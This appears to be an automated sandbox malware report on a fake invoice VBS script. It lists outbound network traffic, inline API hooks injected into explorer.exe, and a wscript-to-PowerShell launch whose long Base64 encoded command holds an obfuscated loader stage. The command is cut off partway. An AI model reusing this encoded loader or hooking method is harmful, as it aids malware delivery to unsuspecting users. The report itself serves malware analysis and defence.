May 10, 2022 14:27:27.171097040 CEST	10267	OUT	Data Raw: 4b 78 75 51 4e 38 46 46 48 4a 74 77 76 6e 64 51 6e 46 41 42 75 55 4a 54 7a 66 71 54 31 61 4f 69 34 32 37 38 43 48 78 74 43 56 70 45 4d 6c 55 43 4e 63 63 65 6c 37 62 56 6b 66 37 71 47 57 6c 48 30 78 67 39 76 57 4b 39 4b 33 4d 67 5a 41 66 74 6e 4a Data Ascii: KxuQN8FFHJtwvndQnFABuUJTzfqT1aOi4278CHxtCVpEMlUCNccel7bVkf7qGWlH0xg9vWK9K3MgZAftnJ0Vayg2fpGUTLpekgpumlaWh7CuozcBJ1Yo6KBmIL2WR4404KqxNHYc2DvWn10LlaF6yIN9dEomdjAWeSoyyEqmiVEXN9Sy2rtfxfwD2ZrZL5kA044x9iapJ8Ob-Vmv6M_KGSmY1v_5Xq9s6mPfe3Aw8MYm-ajrlLZ
May 10, 2022 14:27:27.179091930 CEST	10269	OUT	Data Raw: 75 45 6c 38 45 28 2d 75 74 6f 58 61 6b 54 32 28 65 35 47 45 73 55 53 55 4a 4b 30 78 4e 52 73 66 79 50 37 70 46 79 78 66 65 71 42 6e 77 66 6f 55 67 4c 47 55 50 62 31 35 79 79 68 42 4d 49 48 33 2d 48 47 64 4f 69 62 34 67 4b 33 4c 2d 76 72 70 36 7e Data Ascii: uEl8E(-utoXakT2(e5GEsUSUJK0xNRsfyP7pFyxfeqBnwfoUgLGUPb15yyhBMIH3-HGdOib4gK3L-vrp6~Sgc9nfMXHEEu_PNcoMr8OBtOm3AYmDnwpQn62MO3zBVsp48QhCU6FH24MwwJxTiMo0paiuh44CIr3IH5xaFEsoPzmJd80kdqnjkalBA1LYNj4bBP_keOCZtsJV8HymCVc0qMr9YoCE9AcfpyGZz9NMzhVX0SPzXxk
May 10, 2022 14:27:27.179269075 CEST	10275	OUT	Data Raw: 42 6f 37 74 4b 36 6d 74 31 38 30 43 70 30 4c 76 48 67 58 62 79 66 55 4a 74 43 70 39 47 6f 75 52 34 62 33 53 32 51 55 68 56 32 30 5a 4c 6d 47 48 4d 78 6a 76 63 55 36 62 42 67 6f 69 66 79 63 55 32 7a 38 37 32 44 6b 47 41 43 49 75 37 33 78 78 50 72 Data Ascii: Bo7tK6mt180Cp0LvHgXbyfUJtCp9GouR4b3S2QUhV20ZLmGHMxjvcU6bBgoifycU2z872DkGACIu73xxPr1fXq0LLs_TPNT2QapepooPXhns6v01jdNKHvMxZykAK2MWJBZ~i1zebX9WW7kGP2jcGfCgx8KUKUvbPYehOCcF6xuoCBHDOX1Tspa9JwgVNITUQi-QoFLfJwGI0X7WI(hJgYiLOQlyKh0Ykqqeg6qa9KM4TvK5sEE
May 10, 2022 14:27:27.179419041 CEST	10288	OUT	Data Raw: 72 38 75 44 55 77 6a 56 50 76 43 36 7a 45 52 71 39 6e 6a 47 66 6c 47 39 36 61 48 64 66 49 71 4c 51 4b 76 58 78 7a 46 70 78 43 4f 79 48 4c 32 7a 57 68 6c 7e 5a 51 46 37 44 45 31 32 6f 52 4e 38 61 49 31 62 30 50 6f 48 64 5a 37 6e 68 56 4c 6f 79 46 Data Ascii: r8uDUwjVPvC6zERq9njGflG96aHdfIqLQKvXxzFpxCOyHL2zWhl~ZQF7DE12oRN8aI1b0PoHdZ7nhVLoyFF~NaZGQ35oJ4evVOO3doZmQ~POr87oJTCbgmSTSrbt8jqV7qn3EFY42~5WYV7G9fyPVHkGVMRcs2lsE4vV75dVufVLima5TZFRMie93ESDGcOH5eM9xW3t5fbqU08BLLVMX7CuoofCBXkJo42KgKJN0IMb15D5mlU
May 10, 2022 14:27:27.179589987 CEST	10293	OUT	Data Raw: 35 73 41 78 62 4f 4e 4e 33 33 64 54 50 4c 55 5a 33 54 34 42 49 7e 7a 77 52 6d 74 78 57 57 4a 5a 79 54 63 65 5a 7e 4d 4e 48 58 78 64 76 4a 79 71 51 4a 61 78 50 54 55 74 49 31 45 68 6c 67 5a 6c 4a 75 63 72 43 7a 68 71 54 5a 67 62 61 4d 58 7a 42 54 Data Ascii: 5sAxbONN33dTPLUZ3T4BI~zwRmtxWWJZyTceZ~MNHXxdvJyqQJaxPTUtI1EhlgZlJucrCzhqTZgbaMXzBT049SDHlXys372twSax8tWw4dVT2L9ibB8frT6tFYs2L1IcwPh0z~_RBbryv2BPsaB0wK_CVz3C8iL448QKCXKhUIZBZGpQwK52MQY84Q4FoXTA4EnhAqISK5syTBuWmG8wcap8isFw2iCZAfjreLcVxIwHt8TC4Ep
May 10, 2022 14:27:27.187383890 CEST	10296	OUT	Data Raw: 43 66 77 4f 46 6a 45 55 78 69 42 4a 7a 33 75 33 6c 5a 31 73 43 57 51 41 52 49 32 37 67 71 37 30 4f 6e 7a 54 47 36 5a 33 46 4e 76 7e 75 52 4c 28 41 43 35 49 48 73 6c 4c 79 73 63 58 63 36 44 52 63 37 74 57 70 4f 5a 4d 47 4f 6b 71 4a 7a 39 63 4a 52 Data Ascii: CfwOFjEUxiBJz3u3lZ1sCWQARI27gq70OnzTG6Z3FNv~uRL(AC5IHslLyscXc6DRc7tWpOZMGOkqJz9cJRcuEPO7WSXCP08tQhpMLNgZPxA1Hjc(KldkUGiMW998x0PX5OKh0ukYU1IwMfuKz7NZwo85-46memtbixpmXowss4ay7~bSaldsPYOonT7qForkw85r4wxMR6lg536LGaYEfyPYlyo5rYPj6G1Esdyrf5Qcvo2cXel
May 10, 2022 14:27:27.187552929 CEST	10298	OUT	Data Raw: 4d 4b 31 77 4a 59 67 48 76 59 49 42 33 4b 50 48 4d 68 39 79 6b 51 55 4c 66 65 72 6d 6e 6a 5f 52 51 28 69 46 6b 45 78 6e 74 39 46 7a 67 65 7a 32 34 30 74 43 52 51 75 4e 38 32 6e 62 4a 37 32 37 31 49 44 58 31 65 79 6d 4d 56 56 4d 47 4a 33 4a 35 30 Data Ascii: MK1wJYgHvYIB3KPHMh9ykQULfermnj_RQ(iFkExnt9Fzgez240tCRQuN82nbJ7271IDX1eymMVVMGJ3J50d0y(AGnsmLHVvvnogWeFDNrMobDedzJ4JCgim(H3bAGYJioHaXGJYSPjotsR15n(aI4PPnuvn(eXCWecidsNqZuWuyOn2iVWb7MkcYvX7fY9CI7JkTwCLGorPqnkxkTGMFuXhiT5s7-msG4QSbM3tBaf4pAjd1TOu
May 10, 2022 14:27:27.187735081 CEST	10311	OUT	Data Raw: 63 71 6e 70 59 75 79 46 66 6c 44 69 52 76 33 65 69 6c 50 4e 49 78 4a 7e 6a 4d 4a 50 36 4d 34 47 33 56 43 31 57 6c 64 49 61 28 52 30 68 65 36 67 39 58 42 66 4b 56 34 59 79 49 79 6b 44 6f 51 6a 58 39 5a 76 71 69 58 42 6d 76 6e 53 51 73 39 37 52 38 Data Ascii: cqnpYuyFflDiRv3eilPNIxJ~jMJP6M4G3VC1WldIa(R0he6g9XBfKV4YyIykDoQjX9ZvqiXBmvnSQs97R8DvEHG~bQdWFGlcOQIGNcUdxi8JPWhIhMudaVAYfM4X-nKqzslGDvrjRdprrM3(DDi~CgaCTYLv56yRiUzY0aixS(UpAJ5rhMT5SPZUIMFOzirclbpPKuDzHico7MLeM4rChi8YtOdfVfOkLt7lceV8ECdviBPJGj7

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
PeekMessageA	INLINE	explorer.exe
PeekMessageW	INLINE	explorer.exe
GetMessageW	INLINE	explorer.exe
GetMessageA	INLINE	explorer.exe

Processes

Process: explorer.exe, Module: user32.dll

Function Name	Hook Type	New Data
PeekMessageA	INLINE	0x48 0x8B 0xB8 0x8D 0xDE 0xE9
PeekMessageW	INLINE	0x48 0x8B 0xB8 0x85 0x5E 0xE9
GetMessageW	INLINE	0x48 0x8B 0xB8 0x85 0x5E 0xE9
GetMessageA	INLINE	0x48 0x8B 0xB8 0x8D 0xDE 0xE9

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: wscript.exePID: 9728, Parent PID: 4828

General

Target ID:	0
Start time:	14:21:06
Start date:	10/05/2022
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\WWVN_INVOICE_8363567453.vbs"
Imagebase:	0x7ff728790000
File size:	170496 bytes
MD5 hash:	0639B0A6F69B3265C1E42227D650B7D1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 4736, Parent PID: 9728

General

Target ID:	13
Start time:	14:22:01
Start date:	10/05/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBOAGEAbgBkAGkAbgBtAGUANQAgAEIAbwBiAGwAZQBrAGEAIABBAHIAdABpAGsAdQBsAGUAcgAgAGgAbwB0AG0AIABGAG8AcgBtAG4AaQBuADQAIABWAGkAZwBlAHMAaQBtAG8AawBpADYAIABzAHQAbwBtACAARQBjAGgAaQBuAGkAdAA2ACAAcAByAG8AbgBhAHQAaQB2ACAAUAB5AHIAbwAgAFQAZQB4AHQAdAB2ADcAIABFAGwAZQB2AGEAdABvAHIAZgByACAAUgBBAE0AUgBPAEQAUwBBACAAUQBlAGsAdQByAHMAdQBzAHMAIABiAGUAYQBuAHAAbwAgAFMAawByAGsAMgAgAHAAbwBsAGEAcgBpACAAbQBlAGQAZQBvAGwAYQAgAEwAbwByAGEAIABSAGEAcABoAGkANgAgAA0ACgAjAGQAZQBmAGEAIABwAGkAZQBkACAAVABhAG4AZABrAGQAcwBiAGUAIABVAG4AaQBtAG0AbwByACAAQgBhAGQAZwBlAHIAYgA2ACAAZQB4AGMAbAB1AHMAIABDAGgAbwBuAGQAcgBvAGcAOAAgAEEARQBSAE8ATABPACAARgBJAFMASABFAFIATQBBAE4ASQAgAEYAQQBHAEkATgBUAEUARwBSACAASQBuAGMAZQBwAHQAbwAzACAAUwBuAHUAcgBsADYAIABCAGkAcwBlAHgAdQBhACAAZABvAHMAcwBlAHIAIABnAGEAdgBlAGwAIABtAGUAdABhAGYAbwByAGUAIAB0AHIAYQBuACAAYQB0AGEAawAgAFMAZQBpAHMAbQBpADIAIABOAG8AbgBmAGEAYgB1AGwAIABEAGkAZwB0AGUAawAzACAAUgBFAEcATgBTAEsAQQAgAFAAaAB5AHQAbwBtAGUAOQAgAE0AdQByAGEAZQAgAEgAYQBsAHYAOAAgAFYATwBDAEkARgBFAFIAQQBUAEUAIABXAE8ATwBEAEMAUgBBAEYAVAAgAGgAYQByAGQAaABlAGEAcgB0ACAASwBuAGkAYgAgAHMAZQBqAHQAIAANAAoAIwBJAG0AbQBlAHIAdgBrADgAIABTAHAAcgBvAGcAZgBsACAAUgBFAEQAUwBIAEkAIABzAGkAZgBmAGwAZQB1AHMAIABTAHUAcABlAHIAIAByAGkAZgB0AGUAcgBzACAARwByAG8AdQBjAGgAIABQAHIAbwBlAHYAZQB0AGkAIABQAFIATwBUAEUATgBTAEkAIABMAHkAZABiAGkAbABsAGUAZABlACAAUwBVAEIARQBMAEUAQwBUAFIAIABSAGEAbQBtAGUAdABjAGgAbwByACAAQwBJAFMAUwBFAFMAQQBSACAAQgByAGUAZAAgAGoAbwByAGQAZgBzAHQAZQAgAEEAbgB0AGkAcwBlAG4AcwAgAEwATwBYAE8AIAANAAoAIwBTAHAAbAB1AHIAZwB5AHAAeQA3ACAAUwBlAHAAdABlAG4AIABEAGkAbQBzACAAVABlAGIAcgBlAHYAcwB1AG4AYwAyACAAUwB0AHQAdABlAHAAMgAgAGwAaQBrAHYAaQBkAGUAIABBAGYAdAB2AGkAIABwAGEAbgB0AG8AZwAgAHYAZQBqAGIAeQBnACAAYwBvAGMAbwAgAEkAUwBCAFIAWQAgAFAAQQBTAFMAIABQAGkAbgBmACAAbQB1AG4AaQBrAGEAdAAgAHUAbgBzAGUAIABHAFUATABEAFIAIABNAGUAbABvAGQAaQBvAHUAIABwAGEAbgBpAG0AZQB0AGUAIABSAGEAZgB0AGUAcwBvAHMAdABlACAAYQB2AGEAbgBjAGUAbQBlAG4AdAAgAEUAbgB0AGUAYQBzAHUAYgBwAHIAIABNAFkAQwBFACAAVABpAGQAbABuAG4AZQBkAGUAMwAgAG8AZAB5AHMAcwBlAG4AIABkAHIAeQBwAHQAcgByAGUAbgAgAHAAZQByAHMAbwAgAA0ACgAjAGgAbwByAG4AIABDAGUAbgB0AHIANAAgAEgAZQBuAHIAeQBrAGsAZQBzAGwAOAAgAEYATwBSAEQAQQBNAFAATgBJAE4AIABJAG4AdAByAGEAZgBvAGwAIABDAGEAbABkAHIAbwBuACAAaQBuAGYAcgAgAHYAYQBsAGcAIABTAEkAUwBZAFIASQAgAEcAZQBuAG8AYQBrAG8AIABzAGsAYQBkAGUAZwByAGUAcgAgAFUAbgBkAGUAcgBhAGYAcwBuAGkAMgAgAFYAYQBjAGMAaQBuAGEAdAAgAGQAcgBpAGwAbABlAHIAaQBlAHIAIABDAEgAQQBJACAADQAKACMARABlAHQAbwB4AGkAZgAgAGEAZgBtAGEAbABpACAASABtAG0AZQB0AG4AIABBAGwAawBvAGgAbwBsAHQAeQBwADkAIABsAGkAbgBpAGUAIABUAEEAQQBSAE4AIABtAGUAcgBvACAAUwBwAGUAYwB0AHIAbwA4ACAAcwB0AGoAZQByAG4AIABQAG8AcwBpAHQAaQBvACAAQQB1AHQAbwBiAGkAbwAgAHUAdABhAGsAbgBlACAASAB1AG0AYQBuAGgAbwBvADMAIABvAG0AcABsACAAQgBlAHYAaQBzAGYAcgBlAGwAcwAzACAAQgByAGkAbABsAGUAZgBvAGQAZQA2ACAARQBKAEUATgBEAE8ATQBTACAAVAB1AHIAaQBzAHQAawA0ACAAYwBoAGEAbgB0AGEAbgB0ACAAYgBvAG4AZABlAHMAdABhACAAQgBJAEwARgBSAEEARwBUAEUAUgAgAFMASQBEAEgARQBQAFIARQAgAA0ACgAjAFMAawBpAGQAZQBuAHQAIABhAGEAbgBkAGUAcgBmAGkAYQB1ACAAVABhAGwAbAB3AG8AbwA1ACAAdgBpAG4AbwBsAG8AZwBpAHMAdAAgAEwATwBZAEEATABFACAAVgBhAGwAZQByAGkANAAgAGwAYQB2AGkAbgAgAEIAYQBhAHIAOQAgAGYAbwByAHYAZQBuAHQAZQBsACAATgBvAG4AYwBvAG4AdgAgAA0ACgAjAFAARQBSAFMATwBOAE4AQQBWACAAaQBkAGUAbQBwACAAcwB0AGEAcgB0ACAAYwBoAG8AeQBhAGkAbgB0AGkAIABsAG8AeABpAGMAdAAgAEgAZQBzAHQAZQBiAHIAZQAxACAARgBvAGUAbABlAGIAYQBsACAATQBvAGkAcwAgAEwAYQBsAGwAZQB0ACAATwBiAGUAbABpAHMAawAzACAAZAByAGkAawBrACAATABhAG4AYQBzAHIAIAANAAoAIwBiAGUAcwB0AHIAYQBhAGwAaQBuACAAUwBUAFIATQBQAEUASAAgAFYARQBEAEwAIABNAHkAZQBsAG8AIABEAGkAcwBoACAAQQBjAGMAZQBwAHQAMQAgAFUAbgBwAGwAMwAgAEEAUgBCAEUASgBEAFMATABTAEgAIABBAG4AbQBlAGwAZABlAGwAcwBlACAAUwBLAE8AVgBIAFkAVABUAEUAIABwAHIAcwB0AGUAcwBrAGEAYgAgAFAAdQBiAGwAaQBjAGkAcwA4ACAAVQBtAGkAbgBkAGUAbAA0ACAADQAKACMAcwBwAG8AcgB0AHMAbQBhACAARABrAG4AaQBuAGcAcwBzADQAIABEAGUAcABvAHMAaQAxACAAcgBlAGcAbgBpAG4AZwBzAGYAdQAgAHMAdQBzAHAAZQAgAEQAZQBiAGEAIAByAGUAcQB1AGkAcgAgAFMAYQBsAHQAcwB0AGUAbgBtADEAIABSAEQARQBQAEEATgBHAEkAIAANAAoAIwBTAGUAbAB2AG0AbwBkAHMAaQBnACAAUwBVAEIARAAgAGsAdgBrAHMAZgBpAG4AZwBlACAAQQBuAG8AbQAgAHQAaABhAGkAbABuAGQAZQAgAE8AbgBkAHUAIABuAG8AbgBwACAAVwBJAE4ARABCACAAYQB0AG8AbQB2AGEAYQBiAG4AZQAgAEMAaABpAGUAIABzAHUAYgBjAGgAbwByAG8AaQAgAFMAVABVAFAASABFAEYATwBLACAASQBtAGIAcgB1AGUAbQAgAEUAcgBuAHIAaQBuAGcAcwBmAHkAIABEAHIAbwBvAHAAcwBiADEAIABwAHIAYQBpAHMAZQBmAHUAbABuACAASQBOAEcARQBOACAATwB2AGUAcgAgAEgAbwBkAHMAIABPAHYAZQByAGgAYQB1AGwAZQA4ACAAdwBvAG8AZABzACAAdQByAGUAdABoAHIAbwAgAEwAbwBrAGEAbABrACAADQAKACMAUgBVAE4ARwBMAEUAUwBTAEsAIABWAGUAcgBkACAAYwB5AGMAbABvAGQAIABhAGYAZABrAG4AaQBuAGcAIABiAHUAcwBsACAAQQB0AHQAdQBuAGkAbgBnACAAUwBhAG4AaQB0AGkAcwBpACAAUABoAG8AdABvAHMAIABCAG8AcgBlAHAAbABhAHQAZgAgAE0AYQBqAG8AcgAgAEoAVQBNAEIATABFACAAVwBIAEUARQBMAEkATgAgAEwAZQBlAHAAaQB0AGQAcgA2ACAAVQBOAFUAUwBFAEQAIABNAEEARwBOACAAQQBnAHIAYQBmADEAIABBAG0AYgBlAHIAbgA0ACAAQQBuAGQAZQBuAGsAbABhADgAIABKAGEAZwBnAGUAZABuACAAcwBvAGwAaQBkAGEAdABpAG4AZwAgAEEAbgBnAGkAdgBlACAAQgBSAEUAVgBWACAATQBJAFMAVABBAE4ASwBFAFIAIAANAAoAIwBQAGEAbABlAGkAYwBoAHQAaAB5ADYAIABDAGwAbwB3AG4AZQByAGkAIAB0AHIAaQB2AHMAZQBsAHMAcAAgAFAAYQBtAGUANgAgAFQAaQBnAGgAdAB3AGkAIABVAG4AdwBpAGwAOAAgAFAAZQByAGkANAAgAFAAcgBvAGQAdQBrACAARABhAGcAYwBlAG4AdAByACAARwBSAEEATgBVAEwAQQAgAFMAagB1AHMAcwBlAG4AcwByAG8ANQAgAEkAUwBDAEgASQBBAEMAQgBFACAATABlAGUAZgA3ACAADQAKACMAVAByAGUAbQBvAHUAcgBpAG4AdAA1ACAAUwBKAFUAUwBLAEUATQBBAEwAIABEAGoAZQBsAGwAIABNAGkAbABpAHQAcgBsADkAIABHAGwAbwBzAHMAYQBuACAAUgBFAFYASQBFAFcAUwBEACAAUgBFAEUATABQAEUARABBAE4AVAAgAEgAdQBzAGgAbwBsAGQAZQAgAEEATABJAEUATgBBACAARABvAGIAYgBlAGwAdABmAHUAbgAgAFQAZQBhAHQAIABIAGkAbgBkAGUAcgBlACAAUwBrAHkAZAA3ACAAbQB5AGcAZwBlAHMAIABMAHkAbgBsAGEAYQBzAGgAIABQAGEAYQB0AHIAIABGAGEAYgByAGkAawBzADkAIAANAAoAIwBQAEEAQQBUAEUARwBOAEUAUgAgAEQAZQB0AGEAbABqAGUAcgBlAHIAIAB0AGkAZwBnAGUAcgBzAGsAZQAgAEYAaQBsAGUAcwAgAHIAZQB0AHMAbwBwAGcAcgAgAFAATABVAFIAIABKAHUAZwBlAG4AZABtAG4AcwB0ACAAVQBkAGIAdQA1ACAASABlAGEAdgB5AGgAIABtAGkAbABpACAAbQBlAGwAbwBkACAAYQBmAGwAYQBkAG4AaQBuACAADQAKACMAYQBmAHQAdgAgAGEAYQBuAGQAZQB2AGUAIABiAHIAbwBkAHkAYQBnAGEAcwAgAHQAZQBsAGUAbwBjAGUAcgBhAHMAIABPAEMAVABBAFYATwBLACAAWgBhAHIAegB1ADMAIABJAE4ARABTACAAVABXAEkAUwBDACAAUwBLAE8AVgBTAEwATwAgAFQAbwB3AG4AbABhAG4AZABsAHkAIAANAAoAIwBQAFIASQBTACAARwByAHUAcwB2AGUAagBlADkAIABVAG4AbQBhAHIAYgBsAGUAaQB6ACAAQQBMAEsATwBIAE8ATAAgAEQARQBWAEkAQQBUAEkATwBOACAASABvAG0AYQB0AG8AIABDAHIAZQBhAHQAaQAgAFMAdABvAGIAcwBiADcAIABhAG4AZgBsAGoAZQBuACAARgBvAHIAZQB0AGEAZwBlAG4AIABQAHIAbwB0ACAAVQBQAEwARQBBAFAARQBEACAAZABpAG0AcABsAGUAbQBlACAAZwBlAHIAdABoAGEAcwBoAGEAIABTAFQATwBSAEsARQBOAEIAQgAgAA0ACgAjAEEAcwBzAHUAcgBhAGIAbAAgAE0AZQB0AGEAZgBvAHIAZQByAG4AIABJAEgAVQBLAE8ATQBQACAAWAB5AGwAbwBjADgAIABTAHQAYQBuAGQAYQByACAASABhAG4AZABsAGkAbgBnAHMAbAAgAFAAZQB3AGYAdQBsAGIAbABvADIAIABNAGkAcwB0AG4AMwAgAE8AWQBTAFQARQBSACAARABlAHQAYQBpAGwAcAByACAAcgBlAGYAbwByACAAUgBJAEcAUwBSAEUAVgBJACAAYwBsAG8AZgBpAGIAIABLAE4ASQBDACAAQgByAG4AZQBsAG8AawBrACAARABlAG0AbwBuAHQAZQByADgAIAB0AGEAcgB2ACAAcwBsAGcAZQByAHMAdAAgAFUATgBEAEUAUgAgAA0ACgAjAFMAYQBuAHMAZQB2AGUAOQAgAEkAcgByAGUAcwBwACAAQgBJAFIAQwBIAEUAIABNAGUAZwBhACAARABhAGcAbABuAHMAcwBhADIAIABLAFkAUwBUACAAUwB0AG8AbQBhAHQAbwBsAG8AIABBAHQAdAB5ACAAcgB1AHQAaQBuAGUAcwBzACAAcABpAGMAYQBtAGEAcgAgAGwAYQBjAGMAaQBjAGgAZQAgAEIAWQBHAEcARQBNAFkATgAgAGcAcgBpAG0AYQBzACAAaQBuAHQAcgB1ACAAbQBhAHIAcQAgAGoAYQByAGQAbwBuAG4AIABjAGgAbwBsAG8AcwAgAE0ATwBSAEIASQAgAFMAQQBWAEEARwBFAFMAUwAgAFIASQBEAEUASABFAFMAVABFAFMAIABTAHQAZQBtAG0AZQByAGUAdABzADUAIAByAGUAdgBpACAAQgBhAHMAdABpAGwAbAA4ACAAQgBlAGQAYQAgAFMAQwBVAFIAUgBJAEUAIABVAE0ARQBEAEcAUgAgAEsAeQBsAGkAbgAgAHUAbgBmAGkAIABzAGwAaQBwACAAUABSAEUASABFAE4AUwAgAA0ACgAjAEEAbgBkAGUAbgBrAGwAYQBzAHMAIABkAGUAbQBhACAAUwBDAEkATABMAEEARQBSACAAYgBsAHIAZQBoAGEAIABSAG8AbgBpAG4AZwA4ACAAQwBVAEUATQBBAE4AUwBIAEkAIABLAGEAcwBlAHIAbgAgAFIAdQBmAGcAYQByAGQAaQBuACAAcAByAGEAbgBnAGUAbgAgAFUAUwBQAEUAQwBJAEYASQAgAFMAdQBiAGwAaQBtACAASwBFAFIATgBFAE8AUAAgAEEAcgBpAGQAIABiAHIAbgBlAGYAZAAgAA0ACgAjAEsAYQBmAGYAZQBnACAAQgBvAG8AbgBkAG8AZwBnAGwAZQAgAE4AbwBzAHQAIABSAGkAZgBsAGUAdAB0AG8AcgA3ACAAUwBVAFIARwBFAEwARQBTAFMAIABJAGQAcgB0AHMAaABqAHMAawAyACAAcgBlAHMAZQByAHYAYQB0AGkAbwAgAGsAaQBzAHMAZQAgAGcAYQB5AGwAdQBzAHMAaQB0ACAAYQB0AG8AbQBhAGYAZgBhAGwAZAAgAFIAQQBHAEUATwBVAFMAIABCAHUAdABpAGsAcwBkAHIAaQAgAG8AcABkAGEAdABlACAASABvAHIAbgBiAHIAaQA0ACAAQwBvAG4AcwBhAG4ANwAgAE0ATABLAEUASwAgAEkAbwBkAGkAZABwAGgAaQBsADYAIABJAGQAZQBhAGwAaQBzAG0AZQA0ACAARgBsAGEAZwBlACAASQBuAHYAbwBsAHYAZQByAHMANAAgAHUAbABuAGEAYQBuAGkAIABSAGsAZQBuAHUAbgAgAGwAaQBtAGUAbABpACAAYQBhAHIAcgBpACAAbQBhAGQAZABvAHgAdQBkAHYAIABIAGUAbABoAGUAcwB0AGUAbgBhACAAUABvAHMAdAB1AGwAZQByADEAIABCAGUAegBlAGwAcwBjACAAQgBsAGkAbgAgAA0ACgAjAEMAYQBzAHQAZQByADYAIAB2AGEAbgBkACAAYwBoAGEAZQBuAG8AIABTAHEAdQBhAHQAdAA1ACAASABJAEcASABMACAAQwBvAG4AYwBoAGEAZQAgAFAAYQByAHQAIABEAEUASwBMACAAcwB1AGIAcwBpAGQAZQAgAHUAbgBkAGUAIABmAGEAdQBuAGUAcgBhACAAcwBwAHIAZQBhACAAUABBAEMASQBGAEkAQwBBACAARgBKAEUATgBEAFQATABJACAAYwBlAHAAaABhAGwAbwB0AGgAbwAgAFMARQBSAFIAQQBUAEkATwAgAFMAZQByAGIAaQBzAGsAZQBsADgAIAANAAoAIwBGAEwATABFAFMAQQBOACAAQQByAGEAZwBvAHIAbgB1AG4AYQAgAGUAbgBzAHIAZQB0AHQAZQBkAGUAIABNAHkAZQBsACAAcwB1AHAAZQByAHMAZQB4AGUAIABBAGcAZwByAGEAdgBlAHIAZQAgAHQAaQBtAGUAbABvAGYAIABzAGkAbQBlAG8AbgBiAGUAdgBpACAAUABSAEUATwBQAEUATgBJAE4AIABzAG0AZQBsAHQAZQAgAGoAZQBsAGwAeQBmAGkAcwBoAGEAIABHAGUAcgByAGEAIABQAG8AaQB0AHIAYQBpAGwAbwAgAA0ACgAjAFgAZQBuAG8AZwBsAG8AcwAgAE8AdQB0AG4AIAByAGUAdgBpAHMAbwByAGYAIABWAEEAQQBCAEUATgBGAEEAIABSAHUAbQBzAGsAaQBiAGUAcgAxACAAQQB0AHQAZQBzAHQAZQA5ACAASABhAGEAbgBkAGgAdgBlAGwAcwA4ACAARABJAFAATABPAE0AIABTAEkATABFAE4AQQBMACAATwBhAGsAeQBzAGwAagBkADQAIABMAGEAdABlAG4AcwAgAG0AZgBnAGcAcgB1AG4AIABrAGEAcgB0AG8AdABlAGsAcwBvACAADQAKACMAZQBzAHQAbwAgAFQAYQBsAG0AIABUAHUAYQByAGUAZwAyACAAQgBsAG8AawBmAHUAbgBrAHQAaQAxACAARgBvAHIAbABhACAAVAByAGEAbgAxACAAQQByAGIAZQBqAGQAIABOAG8AbgBjAG8AIABzAGkAZwB0AGUAbQBlAGwAcwBvACAARwBhAGwAdgBhAG4AaQAgAEYAbwBkAGUAcgBmAGEAIABSAGUAcwBlAGMAdAA1ACAADQAKACMARQB0AGEAcABlAGwAYgBlAHQAIABCAGEAYwBrAGYAaQBzAGMAOAAgAE0AWQBMAEQAUgBFACAATQBhAGwAYwA4ACAAZwBhAG0AbQBpAGMAawB1ACAARQBnAG0AdQBuAHQAdgBhACAASABLAEEAUwAgAFUAbgBpAHIAbwBuAGkAYwA1ACAAVABpAGwAYgBhAGcAZQBzAGsAIABGAEkAUgBFAE8ARwBUAFkAVgAgAFMAdABlAGEAZABpAGUAcwB0ACAAUgBnAHQAZQBuAGQAZQBzADQAIABTAGsAdgBhAGQAcgBvAG4AZQAgAEIAcgBlAGkAcwBsAGEAawBpACAADQAKACMAVgBJAFIASwBTAE8ATQBIACAARwB1AGUAcgA4ACAATQBBAE4AQwBIAEUAIABBAGMAYwBvAG0AbQBvAGQAYQB0ACAAUwBlAG0AaQB2AGUAcgB0AGkANwAgAE4AQQBJAFYAIABMAG8AZwBvAGcAIABTAFAASQBEAFMARwAgAGcAawBhAG4AdABsACAAdAB1AGcAcgBpAGsAcwBwAHIAIABjAGgAYQBtACAAUwB5AHMAdABlAG0AYgBlADUAIABCAFIATwBOAFoARQBGACAADQAKACMAUgB1AG0AcABsAGUAbABhAHMAIABEAEEATgBTAEUATQBVAFMARQAgAE0ARQBTAE8AUgBSAEgAIABVAE4ARABJAFMAQwBPAFYARQAgAFQAaQBkAHQAYQBnAGUAcgBlAHIAIABUAHkAcABvAHMAcwB0AG8ANwAgAEIAUgBPAEsAQQBEAEUAUgBTAFIAIABNAHkAbwBzAG8AdAAgAHIAaQBkAGkAYwB1AGwAbwB1ACAAQgB1AGcAdAAgAHMAbABhAG4AdABlACAAagBvAGwAbABpAGUAZABhAG4AdAAgAE8ATQBEAEkAUgBJAEcARQBSACAARABlAHQAcgBvAG4AaQBzACAARgBhAGQAZAAzACAARAByAGkAawBrACAASwBSAEEARwBFAEYAVQBHACAAUABTAEUAVQBEAE8AQQBNAEEAIABTAFkARABEACAAVQBOAEQARQBUAFIASQBNAEUAIAB0AGEAbQBsAHUAbgBnAHMAdQAgAGwAZQBvAG4AYQByAGQAbwB1ACAATwBwAGwAcgAgAGcAZQBtAGkAbgBhAHQAIABGAHIAdQBnAHQAaAA1ACAATQBFAFQAQQAgAFYAQQBOAEQATABCACAAVQBOAFQASABPACAAbQBpAHMAcgBlAGYAZQByAHIAZQAgAEsAaABhAGwANgAgAFMAdQBrAHIAaQBuAGcAZQAgAHYAZwB0AGkAZwAgAA0ACgANAAoADQAKAEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAYwBsAGEAcwBzACAAYwBoAG8AbgBkAHIAbwBnAGEAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAZwBkAGkAMwAyACIAK